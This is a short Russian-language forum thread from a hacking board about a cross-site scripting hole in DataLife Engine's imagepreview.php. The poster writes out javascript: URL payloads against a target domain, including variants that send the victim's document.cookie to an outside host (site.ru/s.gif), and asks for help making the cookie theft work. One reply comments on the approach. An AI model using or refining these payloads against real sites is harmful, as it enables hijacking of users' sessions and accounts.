![]() |
XSS в DataLife Engine. Обсуждение.
Есть уязвимость
Код HTML:
_http://target.ru/engine/modules/imagepreview.php?image=javascript:alert(document.cookie);Пробывал так Код HTML:
_http://target.ru/engine/modules/imagepreview.php?image=javascript:alert(document.location="http://site.ru/s.gif?"+document.cookie);Код HTML:
_http://target.ru/engine/modules/imagepreview.php?image=javascript:alert(document.location("http://site.ru/s.gif?"+document.cookie));ЗЫ: Если подобная тема уже есть, прошу эту удалить, и дать ссылку на более ранею. Зарание спасибо за помощь. С ув. DrBodja. |
И зачем ты делаешь document.location?
Ты хочешь словить пустые куки? Цитата:
|
| Время: 20:53 |